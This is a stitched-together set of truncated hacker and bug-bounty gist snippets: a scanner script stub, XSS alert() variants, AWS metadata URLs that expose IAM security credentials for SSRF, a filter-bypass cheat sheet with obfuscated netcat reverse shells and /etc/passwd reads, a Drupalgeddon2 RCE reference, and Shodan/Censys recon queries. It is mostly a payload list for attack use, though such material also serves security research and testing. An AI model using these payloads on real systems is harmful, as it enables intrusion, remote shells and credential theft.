haccer

#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt

# Premium
function ech() {
  spinner=( "|" "/" "-" "\\" )
  while true; do
    for i in ${spinner[@]}; do
      echo -ne "\r[$i] $1"

tomnomnom

// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:

// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);

No1zy

# coding: utf-8  
import csv
import sys
import datetime
import requests
from bs4 import BeautifulSoup

BASE_URL = 'https://jvndb.jvn.jp'
SOFTWARE_NAME = sys.argv[1]

jhaddix

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

vdb-sander

# -*- coding: utf-8 -*-
#!/usr/bin/env python
import subprocess
import multiprocessing
from multiprocessing import Process, Queue
import os
import time
import fileinput
import atexit
import sys

MagicBlueCH

• /???/c?t /???/pa??wd  

• /???/n??t -e /???/b??h 127.0.0.1 2333

• /b$6in/nc$6at -e /bi$6n/ba$6sh 127.0.0.1 2333

• /b"in/n"c\at -e /b'in/ba's\h 127.0.0.1 2333

• IFS=,;cat<<<cat,/etc/passwd

• cat$IFS/etc/passwd

• cat${IFS}/etc/passwd

• cat</etc/passwd

• {cat,/etc/passwd} OR {ls,-las,/var} with args

g0tmi1k

CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE (SA-CORE-2018-002)

Source: https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708

Improved (Ruby) exploit ~ http://github.com/dreadlocked/Drupalgeddon2/ // https://www.exploit-db.com/exploits/44449/

---

Drupal v8.x

ehsahil

Basics Filters: 
1. City 
Example City:New Delhi. 

2. Country
Example: Country:INDIA

3. Port
Example:Ports: 8443, 8080, 8180 etc

ehsahil

-Commands

443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:domain.com

“hackme.tld” + internal 

“hackme.tld” + sandbox

“hackme.tld” + Staging

EdOverflow

• https://scans.io/
• https://commoncrawl.org/
• https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
• https://www.shodan.io/
• https://opendata.rapid7.com/
• https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
• https://securitytrails.com/
• https://threatcrowd.org/
• https://dnsdumpster.com/
• https://crt.sh/